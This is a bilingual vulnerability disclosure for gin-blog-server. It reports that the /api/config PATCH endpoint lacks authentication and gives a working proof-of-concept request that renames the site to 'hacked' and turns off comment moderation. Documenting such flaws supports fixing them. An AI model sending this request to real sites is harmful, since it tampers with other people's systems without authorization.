/api/config 接口鉴权缺失导致配置篡改漏洞

漏洞位置：gin-blog-server/internal/manager.go 中的 base.PATCH("/config", blogInfoAPI.UpdateConfig)
影响范围：未授权攻击者可任意修改网站核心配置
漏洞描述：UpdateConfig 接口被错误放置于无需鉴权的路由组 base 中，导致攻击者可直接构造请求篡改网站配置信息（如网站名称、备案号、评论审核开关等），可能引发数据污染、安全机制失效或服务中断。

攻击者可通过发送精心构造的 PATCH /api/config 请求，直接修改服务器配置，无需登录或权限验证。
POC（Proof of Concept）：

PATCH /api/config HTTP/1.1
Host: localhost
Content-Type: application/json
Content-Length: 141

{
  "website_record":"1111",
  "is_comment_review":"false",
  "is_message_review":"false",
  "website_name":"hacked",
  "website_author":"hacker"
}

结果如图：

English version：

Vulnerability in /api/config due to Missing Authentication Allowing Configuration Tampering

Location of the Vulnerability:

• gin-blog-server/internal/manager.go in the base.PATCH("/config", blogInfoAPI.UpdateConfig) function.

Impact:

• Unauthorized attackers can arbitrarily modify the core configuration of the website.

Vulnerability Description:

• The UpdateConfig API is incorrectly placed in the unauthenticated route group base. This allows attackers to directly craft requests to tamper with the website's configuration information (such as the website name, record number, comment moderation switch, etc.). This can lead to data pollution, security mechanism failure, or service disruption.

Attack Scenario:

• An attacker can send a carefully crafted PATCH /api/config request to directly modify the server's configuration without needing to log in or pass any authentication checks.

POC (Proof of Concept):

PATCH /api/config HTTP/1.1
Host: localhost
Content-Type: application/json
Content-Length: 141

{
  "website_record":"1111",
  "is_comment_review":"false",
  "is_message_review":"false",
  "website_name":"hacked",
  "website_author":"hacker"
}

Result: